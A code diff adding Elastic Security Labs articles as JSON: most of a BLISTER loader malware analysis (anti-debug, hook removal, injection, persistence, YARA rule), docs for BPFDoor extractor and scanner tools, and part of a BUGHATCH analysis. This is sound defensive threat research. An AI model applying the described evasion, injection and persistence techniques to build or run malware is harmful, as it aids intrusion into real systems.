Combined with code-signing defense evasion, BLISTER appears designed with security technologies in mind.\n\nOur research shows that BLISTER is actively developed and has been [linked](https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html?utm_source=trendmicroresearch&utm_medium=smk&utm_campaign=0422_Socgholish) in public reporting to [LockBit](https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit) ransomware and the [SocGholish](https://redcanary.com/threat-detection-report/threats/socgholish/) framework; in addition, Elastic has also observed BLISTER in relation to the following families: [Amadey](https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey), [BitRAT](https://malpedia.caad.fkie.fraunhofer.de/details/win.bit_rat), [Clipbanker](https://malpedia.caad.fkie.fraunhofer.de/details/win.clipbanker), [Cobalt Strike](https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike), [Remcos](https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos), and [Raccoon](https://malpedia.caad.fkie.fraunhofer.de/details/win.raccoon) along with others.\n\nIn this post, we will explain how BLISTER continues to operate clandestinely, highlight the loader’s core capabilities (injection options, obfuscation, and anti-analysis tricks) as well as provide a configuration extractor that can be used to dump BLISTER embedded payloads.\n\nConsider the following [sample](https://www.virustotal.com/gui/file/afb77617a4ca637614c429440c78da438e190dd1ca24dc78483aa731d80832c2) representative of BLISTER for purposes of this analysis. 
This sample was also used to develop the initial BLISTER family YARA signature and the configuration extraction script, and to evaluate both against unknown x32 and x64 BLISTER samples.\n\n## Execution Flow\n\nThe execution flow consists of the following phases:\n\n- Deciphering the second stage\n- Retrieving configuration and packed payload\n- Payload unpacking\n- Persistence mechanisms\n- Payload injection\n\n### Launch / Entry Point\n\nDuring the first stage of the execution flow, BLISTER is embedded in a legitimate version of the [colorui.dll](https://www.virustotal.com/gui/file/1068e40851b243a420cb203993a020d0ba198e1ec6c4d95f0953f81e13046973/details) library. The threat actor, with a previously achieved foothold, uses the Windows built-in rundll32.exe utility to load BLISTER by calling the export function **LaunchColorCpl** :\n\n```\nRundll32 execution arguments\n\nrundll32.exe \"BLISTER.dll,LaunchColorCpl\"\n```\n\nThe image below demonstrates how BLISTER’s DLL is modified, noting that the export start is patched with a function call (line 17) to the malware entrypoint.\n\n\n\nIf we compare one of these malicious loaders to the original DLL it masquerades as, we can see where the patch was made; the function no longer exists:\n\n\n\n### Deciphering Second Stage\n\nBLISTER’s second stage is ciphered in its [resource section](https://docs.microsoft.com/en-us/windows/win32/debug/pe-format#the-rsrc-section) (.rsrc).\n\nThe deciphering routine begins with a loop-based sleep to evade detection:\n\n\n\nBLISTER then enumerates and hashes each export of ntdll, comparing export names against loaded module names, searching specifically for the **NtProtectVirtualMemory** API:\n\n\n\nFinally, it looks for a memory region of 100,832 bytes by searching for a specific memory pattern, beginning its search at the return address, which leads into the .rsrc section. 
When found, BLISTER performs an eXclusive OR (XOR) operation on the memory region with a four-byte key, sets its page protection to PAGE_EXECUTE_READ with a call to NtProtectVirtualMemory, and calls its second-stage entry point with the deciphering key as a parameter:\n\n\n\n### Obfuscation\n\nBLISTER’s second stage involves obfuscating functions, scrambling their control flow by splitting their basic blocks with unconditional jumps and randomizing basic blocks’ locations. An example appears below.\n\n\n\nBLISTER inserts junk code into basic blocks as yet another form of defense evasion, as seen below.\n\n\n\n### Retrieving Configuration and Packed Payload\n\nBLISTER uses the previous stage’s four-byte key to locate and decipher its configuration.\n\nThe routine begins by searching its memory, beginning at the return address, for its four-byte key XORed with a hardcoded value as a memory pattern:\n\n\n\nWhen located, the 0x644-byte configuration is copied and XOR-decrypted with the same four-byte key:\n\n\n\nFinally, it returns a pointer to the beginning of the packed PE, which is after the 0x644-byte blob:\n\n\n\nSee the [configuration structure](https://www.elastic.co/security-labs/blister-loader#configuration-structure) in the appendix.\n\n### Time Based Anti Debug\n\nAfter loading the configuration, and depending on whether the **kEnableSleepBasedAntiDebug** flag (0x800) is set, BLISTER calls its time-based anti-debug function:\n\n\n\nThis function starts by creating a thread with the Sleep Windows function as a starting address and 10 minutes as the argument:\n\n\n\nThe main thread will sleep using **NtDelayExecution** until the sleep thread has exited:\n\n\n\nFinally, the function returns 0 when the sleep thread has run for at least 9 1/2 minutes:\n\n\n\nIf not, the function will return 1 and the process will be terminated:\n\n\n\n### Windows API\n\n#### Blister’s GetModuleHandle\n\nBLISTER implements its own **GetModuleHandle** to evade detection. The function takes 
the library name hash as a parameter, iterates over the process [PEB LDR](https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb_ldr_data)’s modules, and checks each hashed module name against the one passed in the parameter:\n\n\n\n#### Blister’s GetProcAddress\n\nBLISTER’s **GetProcAddress** takes the target DLL and the export hash as parameters, along with a flag that tells the function the library is 64-bit.\n\nThe DLL can be loaded or mapped; the function then iterates over the DLL’s export function names and compares their hashes with the ones passed in the parameter:\n\n\n\nIf the export is found, and its virtual address isn’t null, it is returned:\n\n\n\nOtherwise, the DLL is loaded via **LdrLoad** and BLISTER’s **GetProcAddress** is called again with the newly loaded DLL:\n\n\n\n#### Library Manual Mapping\n\nBLISTER manually maps a library using **NtCreateFile** in order to open a handle on the DLL file:\n\n\n\nNext, it creates a section with the handle by calling **NtCreateSection** with the **SEC_IMAGE** attribute, which tells Windows to load the binary as a PE:\n\n\n\n_NtCreateSection used within mapping function_\n\nFinally, it maps the section with **NtMapViewOfSection** :\n\n\n\n#### x32/x64 Ntdll Mapping\n\nFollowing the call to its anti-debug function, BLISTER manually maps 32-bit and 64-bit versions of NTDLL.\n\nIt starts by mapping the x32 version:\n\n\n\nThen it disables [SysWOW64 redirection](https://docs.microsoft.com/en-us/windows/win32/winprog64/file-system-redirector):\n\n\n\nAnd then maps the 64-bit version:\n\n\n\nThen, if available, the mapped libraries will be used with the **GetProcAddress** function, i.e.:\n\n\n\n#### LdrLoading Windows Libraries and Removing Hooks\n\nAfter mapping the 32-bit and 64-bit **NTDLL** versions, BLISTER will **LdrLoad** several Windows libraries and remove potential hooks:\n\n\n\nFirst, it tries to convert the hash to the library name by comparing the hash against a fixed list of known hashes:\n\n\n\nIf 
the hash is found, BLISTER uses **LdrLoad** to load the library:\n\n\n\nThen BLISTER searches for the corresponding module in its own process:\n\n\n\nAnd maps a fresh copy of the library with the module’s **FullDllName** :\n\n\n\n\n\nBLISTER then applies the relocations to the mapped library, with the loaded one as the base address for the relocation calculation:\n\n\n\nNext BLISTER iterates over each section of the loaded library to check whether the section is executable:\n\n\n\nIf the section is executable, it is replaced with the mapped one, thus removing any hooks:\n\n\n\n#### x64 API Call\n\nBLISTER can call 64-bit library functions through the use of a special 64-bit function wrapper:\n\n\n\n\n\nTo make this call, BLISTER switches from 32-bit to 64-bit code using the old Heaven’s Gate [technique](https://blog.talosintelligence.com/2019/07/rats-and-stealers-rush-through-heavens.html):\n\n\n\n\n\n\n\n## Unpacking Payload\n\nDuring the unpacking process of the payload, the malware starts by allocating memory using **NtAllocateVirtualMemory** and passing in configuration information. A **memcpy** function is used to store a copy of the encrypted/compressed payload in a buffer for the next stage (decryption).\n\n\n\n### Deciphering\n\nBLISTER leverages the Rabbit stream cipher, passing in the previously allocated buffer containing the encrypted payload and the compressed data size, along with the 16-byte deciphering key and 8-byte IV.\n\n\n\n\n\n### Decompression\n\nAfter the decryption stage, the payload is then decompressed using **RtlDecompressBuffer** with the LZNT1 compression format.\n\n\n\n## Persistence Mechanism\n\nTo achieve persistence, BLISTER leverages Windows shortcuts by creating an LNK file inside the Windows startup folder. 
It creates a new directory using the **CreateDirectoryW** function with a unique hardcoded string found in the configuration file such as: C:\\ProgramData`UNIQUE STRING\\\\>`\n\nBLISTER then copies C:\\System32\\rundll32.exe and itself to the newly created directory and renames the files to UNIQUE STRING\\\\>.exe and UNIQUE STRING\\\\>.dll, respectively.\n\nBLISTER uses the **CopyModuleIntoFolder** function and the **IFileOperation** Windows **COM** interface for [bypassing UAC](https://www.elastic.co/security-labs/exploring-windows-uac-bypasses-techniques-and-detection-strategies) when copying and renaming the files:\n\n\n\nThe malware creates an LNK file using the **IShellLinkW COM** interface and stores it in `C:\\Users\\\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Startup as UNIQUE STRING\\\\>.lnk`\n\n\n\nThe LNK file is set to run the export function **LaunchColorCpl** of the newly copied malware with the renamed instance of rundll32: C:\\ProgramData\\UNIQUE STRING\\\\>\\UNIQUE STRING\\\\>.exe C:\\ProgramData\\UNIQUE STRING\\\\>\\UNIQUE STRING\\\\>.dll,LaunchColorCpl\n\n## Injecting Payload\n\nBLISTER implements 3 different injection techniques to execute the payload according to the configuration flag:\n\n\n\n### Shellcode Execution\n\nAfter decrypting the shellcode, BLISTER allocates a read-write memory region with the **NtAllocateVirtualMemory** API and copies the shellcode into it; it then sets the memory region to read-write-execute with **NtProtectVirtualMemory** and executes the shellcode.\n\n\n\n### Own Process Injection\n\nBLISTER can execute DLL or executable payloads reflectively in its memory space. It first creates a section with the **NtCreateSection** API.\n\n\n\nBLISTER then tries to map a view on the created section at the payload’s preferred base address. 
In case the preferred address is not available and the payload is an executable, it will simply map a view on the created section at a random address and then perform relocation.\n\n\n\nConversely, if the payload is a DLL, it will first unmap the memory region of the current process image and then map a view on the created section at the payload’s preferred address.\n\n\n\nBLISTER then calls a function to copy the PE headers and the sections.\n\n\n\nFinally, BLISTER executes the loaded payload in memory starting from its entry point if the payload is an executable. In case the payload is a DLL, it will find its export function according to the hash in the config file and execute it.\n\n### Process Hollowing\n\nBLISTER is able to perform [process hollowing](https://attack.mitre.org/techniques/T1055/012/) in a remote process:\n\nFirst, there is an initial check for a specific module hash value (0x12453653); if met, BLISTER performs process hollowing against the Internet Explorer executable.\n\n\n\nIf not, the malware performs remote process hollowing with **Werfault.exe**. BLISTER follows standard techniques used for process hollowing.\n\n\n\nThere is one path within this function: if certain criteria matching Windows OS versions and build numbers are met, the hollowing technique is performed by dropping a temporary file on disk within the **AppData** folder, titled **Bg.Agent.ETW**, with an explicit extension.\n\n\n\n\n\n\n\nThe malware uses this file to read and write the malicious DLL. 
Werfault.exe is started by BLISTER, the contents of this temporary DLL are loaded into the memory of the Werfault process, and the file is deleted shortly after.\n\n\n\n## Configuration Extractor\n\nAutomating configuration and payload extraction from BLISTER is a key aspect of threat hunting, as it gives visibility into the campaign and the malware deployed by the threat actors, enabling us to discover new unknown samples and Cobalt Strike instances in a timely manner.\n\nOur extractor uses a [Rabbit stream cipher implementation](https://github.com/Robin-Pwner/Rabbit-Cipher) and takes either a directory of samples with the **-d** option or a single sample with **-f**.\n\n\n\nTo enable the community to further defend themselves against existing and new variants of the BLISTER loader, we are making the configuration extractor open source under the Apache 2 License. The configuration extractor documentation and binary download can be accessed [here](https://www.elastic.co/security-labs/blister-configuration-extractor).\n\n## Conclusion\n\nBLISTER continues to be a formidable threat, punching above its weight class, distributing popular malware families and implants that lead to major compromises. Elastic Security has been tracking BLISTER for months and we see no signs of this family slowing down.\n\nFrom reversing BLISTER, our team was able to identify key functionality such as different injection methods, multiple techniques for defense evasion using anti-debug/anti-analysis features, and heavy reliance on Windows native APIs. 
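For defenders who want to resolve the hashes referenced throughout this analysis, the rotate-and-add hashing routine reproduced in the appendix is easy to reimplement. A minimal Python sketch follows, assuming the same 32-bit wrap-around as the decompiled C routine (the sample inputs are illustrative only):

```python
def blister_hash(name: str) -> int:
    # Mirrors the appendix routine: hash = ((hash >> 23) | (hash << 9)) + *name++,
    # computed over uint32_t (rotate-left by 9, then add the character code).
    h = 0
    for ch in name:
        h = (((h >> 23) | (h << 9)) + ord(ch)) & 0xFFFFFFFF
    return h

# Hand-checkable values: 'A' -> 0x41, 'AB' -> rotl32(0x41, 9) + 0x42 = 0x8242
assert blister_hash("A") == 0x41
assert blister_hash("AB") == 0x8242
```

Computing this hash over known DLL and export names yields a lookup table that can be compared against the hashes observed in samples.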
We are also releasing a configuration extractor that can statically retrieve actionable information from BLISTER samples as well as dump out the embedded payloads.\n\n## Appendix\n\n### Configuration Structure\n\n```\nBLISTER configuration structure\n\nstruct Config {\n uint16_t flag;\n uint32_t payload_export_hash;\n wchar_t w_payload_filename_and_cmdline[783];\n size_t compressed_data_size;\n size_t uncompressed_data_size;\n uint8_t pe_deciphering_key[16];\n uint8_t pe_deciphering_iv[8];\n};\n\n```\n\n### Configuration’s Flags\n\n```\nBLISTER configuration flags\n\nenum Config::Flags {\n kDoPersistance = 0x1,\n kOwnProcessReflectiveInjectionMethod = 0x2,\n kOwnProcessHollowingMethod = 0x8,\n kRemoteProcessHollowingMethod = 0x10,\n kExecutePayloadExport = 0x20,\n kExecuteShellcodeMethod = 0x40,\n kInjectWithCmdLine = 0x80,\n kSleepAfterInjection = 0x100,\n kEnableSleepBasedAntiDebug = 0x800,\n};\n```\n\n### Hashing Algorithm\n\n```\nBLISTER hashing algorithm\n\nuint32_t HashLibraryName(wchar_t *name) {\n uint32_t hash = 0;\n while (*name) {\n hash = ((hash >> 23) | (hash << 9)) + *name++;\n }\n return hash;\n}\n```\n\n### Indicators\n\n| Indicator | Type | Note |\n| ---------------------------------------------------------------- | ------ | ----------- |\n| afb77617a4ca637614c429440c78da438e190dd1ca24dc78483aa731d80832c2 | SHA256 | BLISTER DLL |\n\n## YARA Rule\n\nThis updated YARA rule has shown a 13% improvement in detection rates.\n\n```\nBLISTER YARA rule\n\nrule Windows_Trojan_BLISTER {\n meta:\n Author = \"Elastic Security\"\n creation_date = \"2022-04-29\"\n last_modified = \"2022-04-29\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"BLISTER\"\n threat_name = \"Windows.Trojan.BLISTER\"\n description = \"Detects BLISTER loader.\"\n reference_sample = \"afb77617a4ca637614c429440c78da438e190dd1ca24dc78483aa731d80832c2\"\n\n strings:\n $a1 = { 8D 45 DC 89 5D EC 50 6A 04 8D 45 F0 50 8D 45 EC 50 6A FF FF D7 }\n $a2 = { 75 F7 39 4D 
FC 0F 85 F3 00 00 00 64 A1 30 00 00 00 53 57 89 75 }\n $a3 = { 78 03 C3 8B 48 20 8B 50 1C 03 CB 8B 78 24 03 D3 8B 40 18 03 FB 89 4D F8 89 55 E0 89 45 E4 85 C0 74 3E 8B 09 8B D6 03 CB 8A 01 84 C0 74 17 C1 C2 09 0F BE C0 03 D0 41 8A 01 84 C0 75 F1 81 FA B2 17 EB 41 74 27 8B 4D F8 83 C7 02 8B 45 F4 83 C1 04 40 89 4D F8 89 45 F4 0F B7 C0 3B 45 E4 72 C2 8B FE 8B 45 04 B9 }\n $b1 = { 65 48 8B 04 25 60 00 00 00 44 0F B7 DB 48 8B 48 ?? 48 8B 41 ?? C7 45 48 ?? ?? ?? ?? 4C 8B 40 ?? 49 63 40 ?? }\n $b2 = { B9 FF FF FF 7F 89 5D 40 8B C1 44 8D 63 ?? F0 44 01 65 40 49 2B C4 75 ?? 39 4D 40 0F 85 ?? ?? ?? ?? 65 48 8B 04 25 60 00 00 00 44 0F B7 DB }\n condition:\n any of them\n}\n```\n\n## References\n\n- [https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign](https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign)\n- [https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html](https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html?utm_source=trendmicroresearch&utm_medium=smk&utm_campaign=0422_Socgholish)\n- [https://redcanary.com/threat-detection-report/threats/socgholish/](https://redcanary.com/threat-detection-report/threats/socgholish/)\n\n## Artifacts\n\nArtifacts are also available for [download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blte5a55b99e66b4794/628e88d91cd65960bcff2862/blister-indicators.zip) in both ECS and STIX format in a combined zip bundle.\n"
+ },
+ "title": "BLISTER Loader",
+ "slug": "blister-loader",
+ "date": "2023-04-13",
+ "description": "The BLISTER loader continues to be actively used to load a variety of malware.",
+ "author": [
+ {
+ "slug": "cyril-francois"
+ },
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "salim-bitam"
+ }
+ ],
+ "image": "blog-thumb-power-lines.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "blister",
+ "malware"
+ ]
+ },
+ "id": "security_labs_content-blister_loader-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-bpfdoor_configuration_extractor-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-bpfdoor_configuration_extractor-md.json
new file mode 100644
index 00000000000..377da1712a8
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-bpfdoor_configuration_extractor-md.json
@@ -0,0 +1,27 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"BPFDoor Configuration Extractor\"\nslug: \"bpfdoor-configuration-extractor\"\ndate: \"2022-12-06\"\ndescription: \"Configuration extractor to dump out hardcoded passwords with BPFDoor.\"\nauthor:\n - slug: elastic-security-labs\nimage: \"tools-image.jpg\"\ncategory:\n - slug: tools\ntags:\n - bpfdoor\n---\n\nConfiguration extractor to dump out hardcoded passwords with BPFDoor.\n\n[Download bpfdoor-config-extractor.tar.gz](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt3f57100ade3473c5/62882ccdb4fa6b61ed70ba87/bpfdoor-config-extractor.tar.gz)\n\n## Overview\n\nThis tool provides a Python module and command line tool that will extract passwords from BPFDoor samples.\n\n> The Elastic Security Team has released an in-depth analysis of the BPFDoor malware and created an additional tool that will scan for BPFDoor infected hosts.\n>\n> - [BPFDoor analysis](https://bookish-bassoon-c37be003.pages.github.io/intelligence/2022/05/04.bpfdoor/article/)\n> - [BPFDoor scanner](https://www.elastic.co/security-labs/bpfdoor-scanner)\n\n## Getting Started\n\n### Docker\n\nWe can easily run the extractor with Docker; first, we need to build the image.\n\n```\nBuilding the BPFDoor Docker image\n\ndocker build . 
-t bpfdoor-extractor\n```\n\nThen we run the container with the **-v** flag to map a host directory to the Docker container directory that contains the BPFDoor samples.\n\n```\nRunning the BPFDoor Docker container\n\ndocker run -ti --rm -v $(pwd)/binaries:/binaries \\\n bpfdoor-extractor:latest -d /binaries/\n```\n\nWe can either specify a single sample with **-f** option or a directory of samples with **-d**\n\n```\nBPFDoor Configuration Extractor help output\n\ndocker run -ti --rm bpfdoor-extractor:latest -h\n\nAuthor: Elastic Security (MARE)\n\n______ ______ ______ ______\n| ___ \\| ___ \\| ___|| _ \\\n| |_/ /| |_/ /| |_ | | | | ___ ___ _ __\n| ___ \\| __/ | _| | | | |/ _ \\ / _ \\ | '__|\n| |_/ /| | | | | |/ /| (_) || (_) || |\n\\____/ \\_| \\_| |___/ \\___/ \\___/ |_|\n _____ __ _ _____ _ _\n/ __ \\ / _|(_) | ___| | | | |\n| / \\/ ___ _ __ | |_ _ __ _ | |__ __ __| |_ _ __ __ _ ___ | |_ ___ _ __\n| | / _ \\ | '_ \\ | _|| | / _` | | __|\\ \\/ /| __|| '__|/ _` | / __|| __|/ _ \\ | '__|\n| \\__/\\| (_) || | | || | | || (_| | | |___ > < | |_ | | | (_| || (__ | |_| (_) || |\n \\____/ \\___/ |_| |_||_| |_| \\__, | \\____//_/\\_\\ \\__||_| \\__,_| \\___| \\__|\\___/ |_|\n __/ |\n |___/\n\n\nusage: bpfdoor-extractor [-h] (-f FILENAME | -d DIRNAME)\n\noptions:\n -h, --help show this help message and exit\n -f FILENAME, --file FILENAME\n File\n -d DIRNAME, --dir DIRNAME\n Directory\n\n```\n\n### Running it Locally\n\nAs mentioned above, Docker is the recommended approach to running this project, however you can also run this locally. This project uses [Poetry](https://python-poetry.org/) to manage dependencies, testing, and metadata. If you have Poetry installed already, from this directory, you can simply run the following commands to run the tool. 
This will set up a virtual environment, install the dependencies, activate the virtual environment, and run the console script.\n\n```\npoetry lock\npoetry install\npoetry shell\nbpfdoor-extractor --help\n```\n\nOnce that works, you can do the same sort of things as mentioned in the Docker instructions above.\n"
+ },
+ "title": "BPFDoor Configuration Extractor",
+ "slug": "bpfdoor-configuration-extractor",
+ "date": "2022-12-06",
+ "description": "Configuration extractor to dump out hardcoded passwords with BPFDoor.",
+ "author": [
+ {
+ "slug": "elastic-security-labs"
+ }
+ ],
+ "image": "tools-image.jpg",
+ "category": [
+ {
+ "slug": "tools"
+ }
+ ],
+ "tags": [
+ "bpfdoor"
+ ]
+ },
+ "id": "security_labs_content-bpfdoor_configuration_extractor-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-bpfdoor_scanner-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-bpfdoor_scanner-md.json
new file mode 100644
index 00000000000..28fe37c80b1
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-bpfdoor_scanner-md.json
@@ -0,0 +1,27 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"BPFDoor Scanner\"\nslug: \"bpfdoor-scanner\"\ndate: \"2022-12-06\"\ndescription: \"Python script to identify hosts infected with the BPFDoor malware.\"\nauthor:\n - slug: elastic-security-labs\nimage: \"tools-image.jpg\"\ncategory:\n - slug: tools\ntags:\n - bpfdoor\n---\n\nPython script to identify hosts infected with the BPFDoor malware.\n\n[Download bpfdoor-scanner.tar.gz](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltae9bafece9048014/62882b50dcc93261eccb04e2/bpfdoor-scanner.tar.gz)\n\n## Getting Started\n\nThis tool provides a Python script to identify hosts that are infected with the BPFDoor malware.\n\n> The Elastic Security Team has released an in-depth analysis of the BPFDoor malware and created an additional tool that will extract configurations from BPFDoor malware samples.\n>\n> - [BPFDoor analysis](https://bookish-bassoon-c37be003.pages.github.io/intelligence/2022/05/04.bpfdoor/article/)\n> - [BPFDoor configuration extractor](https://www.elastic.co/security-labs/bpfdoor-configuration-extractor)\n\n### Permissions\n\nOn Linux (and thus in a container), the tool requires the following permissions:\n\n- CAP_NET_BIND_SERVICE\n- CAP_NET_RAW\n\nOn any \\*NIX host, running the script with sudo will get you what you need. As long as you don’t strip the privileges listed for your container and you publish the UDP port you intend to receive on, you should be set.\n\n### Docker\n\nWe can easily run the scanner with Docker; first, we need to build the image:\n\n```\nBuilding the BPFDoor scanner Docker image\n\ndocker build . 
-t bpfdoor-scanner\n```\n\n## Usage\n\nOnce you’ve built the Docker image, we can run the container to get a list of the options.\n\n```\nRunning the BPFDoor container\n\ndocker run -ti --rm bpfdoor-scanner:latest --help\n\nUsage: bpfdoor-scanner [OPTIONS]\n\n Sends a discovery packet to suspected BPFDoor endpoints.\n\n Example usage:\n\n sudo ./bpfdoor-scanner --target-ip 1.2.3.4\n\n Sends a packet to IP 1.2.3.4 using the default target port 68/UDP (tool\n listens on all ports) using the default interface on this host and listens\n on port 53/UDP to masquerade as traffic.\n\n NOTE: Elevated privileges are required for source ports < 1024.\n\nOptions:\n --target-ip TEXT [required]\n --target-port INTEGER [default: 68]\n --source-ip TEXT IP for target to respond to and attempt to bind\n locally [default: 172.17.0.3]\n --source-port INTEGER Local port to listen on for response [default: 53]\n --timeout INTEGER Number of seconds to wait for response [default: 5]\n -v, --verbose Show verbose output\n -d, --debug Show debug output\n --version\n --help Show this message and exit.\n```\n\nThe minimum required option is just --target-ip. The rest have defaults. For running in a container, you’ll want to publish the return port (defaults to 53) and specify --source-ip of the host interface you wish to use. In the following example, the IP 192.168.100.10 is the interface on my host that will receive the packet.\n\n```\nExample running the BPFDoor scanner\n\ndocker run -ti --publish 53:53/udp --rm bpfdoor-scanner:latest \\\n --target-ip 192.168.32.18 --source-ip 192.168.100.10\n```\n\n## Running Locally\n\nAs mentioned above, Docker is the recommended approach to running this project; however, you can also run it locally. This project uses [Poetry](https://python-poetry.org/) to manage dependencies, testing, and metadata. If you have Poetry installed already, from this directory, you can simply run the following commands to run the tool. 
This will set up a virtual environment, install the dependencies, activate the virtual environment, and run the console script.\n\n```\nRunning BPFDoor scanner locally\n\npoetry lock\npoetry install\npoetry shell\nsudo bpfdoor-scanner --help\n```\n\nOnce that works, you can do the same sort of things as mentioned in the Docker instructions above.\n"
+ },
+ "title": "BPFDoor Scanner",
+ "slug": "bpfdoor-scanner",
+ "date": "2022-12-06",
+ "description": "Python script to identify hosts infected with the BPFDoor malware.",
+ "author": [
+ {
+ "slug": "elastic-security-labs"
+ }
+ ],
+ "image": "tools-image.jpg",
+ "category": [
+ {
+ "slug": "tools"
+ }
+ ],
+ "tags": [
+ "bpfdoor"
+ ]
+ },
+ "id": "security_labs_content-bpfdoor_scanner-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-bughatch_malware_analysis-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-bughatch_malware_analysis-md.json
new file mode 100644
index 00000000000..1ee381d5ff4
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-bughatch_malware_analysis-md.json
@@ -0,0 +1,30 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"BUGHATCH Malware Analysis\"\nslug: \"bughatch-malware-analysis\"\ndate: \"2022-09-09\"\nsubtitle: \"Malware analysis of the BUGHATCH downloader.\"\ndescription: \"Elastic Security has performed a deep technical analysis of the BUGHATCH malware. This includes capabilities as well as defensive countermeasures.\"\nauthor:\n - slug: salim-bitam\nimage: \"libraries-edev-ops-1680x980.jpg\"\ncategory:\n - slug: malware-analysis\ntags:\n - bughatch\n - cuba\n - ref9019\n---\n\n## Key takeaways\n\n- Elastic Security Labs is releasing a BUGHATCH malware analysis report from a recent [campaign](https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis)\n- This report covers detailed code analysis, network communication protocols, command handling, and observed TTPs\n- From this research we produced a [YARA rule](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Bughatch.yar) to detect the BUGHATCH downloader\n\n## Preamble\n\nBUGHATCH is an implant of a custom C2 deployed during the CUBA ransomware campaigns we observed in February of 2022. This tool was most likely built by the threat actors themselves, as it was not used previously.\n\nBUGHATCH is capable of downloading and executing commands and arbitrary code; it gives the operator the freedom to execute payloads with different techniques like reflection, shellcode execution, system command execution, and so on. 
The samples we have seen were not obfuscated and were deployed using a custom obfuscated in-memory dropper written in PowerShell and referred to as [TERMITE by Mandiant](https://www.mandiant.com/resources/unc2596-cuba-ransomware).\n\nIn this document, we will go through the execution flow of BUGHATCH, highlighting its functionalities and code execution techniques; a YARA rule and the MITRE ATT&CK mapping can be found in the appendix.\n\nIn this analysis we will describe the following:\n\n- Token adjustment\n- Information collection\n- Threading and thread synchronization\n- Network communication protocol\n- Command handling\n\n> For information on the CUBA ransomware campaign and associated malware analysis, check out our blog posts detailing this:\n>\n> - [CUBA Ransomware Campaign](https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis)\n> - [CUBA Malware Analysis](https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis)\n\n## Static analysis\n\n| | |\n| ------------ | ---------------------------------------------------------------- |\n| SHA256 | F1325F8A55164E904A4B183186F44F815693A008A9445D2606215A232658C3CF |\n| File Size | 35840 bytes |\n| File Type | Win32 executable |\n| Signed? | No |\n| Packer? | No |\n| Compiler | Visual Studio 2017 - 15.5.0 preview 2 |\n| Compile Time | Sun Feb 06 21:05:18 2022 UTC |\n| Entropy | 6.109 |\n\n### Sections\n\n| | | | | | |\n| ------ | -------------- | ------------ | -------- | ------- | -------------------------------- |\n| Name | VirtualAddress | Virtual Size | Raw Size | Entropy | MD5 |\n| .text | 0x1000 | 0x6000 | 0x5400 | 5.933 | A6E30CCF838569781703C943F18DC3F5 |\n| .rdata | 0x7000 | 0x3000 | 0x2A00 | 6.217 | 9D9AD1251943ECACE81644A7AC320B3C |\n| .data | 0xA000 | 0x1000 | 0x400 | 1.163 | B983B8EB258220628BE2A88CA44286B4 |\n| .reloc | 0xB000 | 0x424 | 0x600 | 5.235 | 39324A58D79FC5B8910CBD9AFBF1A6CB |\n\n## Code analysis\n\nBUGHATCH is an in-memory implant loaded by an obfuscated PowerShell script that decodes and executes an embedded shellcode blob in its allocated memory space using common Windows APIs ( **VirtualAlloc** , **CreateThread** , **WaitForSingleObject** ).\n\nThe PowerShell loader uses inline C# to load APIs needed for shellcode injection as seen in the following pseudocode.\n\n\n\nThe PowerShell script is obfuscated with random functions and variable names and contains the shellcode in a reverse-Base64 format.\n\n\n\nThe script first decodes the reverse-Base64 encoded data, then allocates a memory region with **VirtualAlloc** before copying the shellcode into it. 
Finally, the script executes the shellcode by creating a new thread with the **CreateThread** API.\n\n\n\nThe shellcode downloads another shellcode blob and the encrypted PE implant from the C2 server; this second shellcode decrypts and reflectively loads the PE malware.\n\nThis section dives deeper into the BUGHATCH execution flow, threading and encryption implementation, communication protocol with C2, and finally the supported commands and payload execution techniques implemented.\n\nThe following is a diagram summarizing the execution flow of the implant:\n\n\n\n\n\n### Token adjustment\n\nThe implant starts by elevating permissions using the **SeDebugPrivilege** method, enabling the malware to access and read the memory of other processes. It leverages common Windows APIs to achieve this as shown in the pseudocode below:\n\n\n\n### Information collection\n\nThe malware collects host-based information used to fingerprint the infected system; this information will be stored in a custom structure that will be 2-byte XOR encrypted and sent to the C2 server in an HTTP POST request.\n\nThe following lists the collected information:\n\n- Current value of the performance counter\n- Network information\n- System information\n- Token information\n- Domain and Username of the current process\n- Current process path\n\n#### Current value of the performance counter\n\nUsing the **QueryPerformanceCounter** API, it collects the amount of time since the system was last booted. 
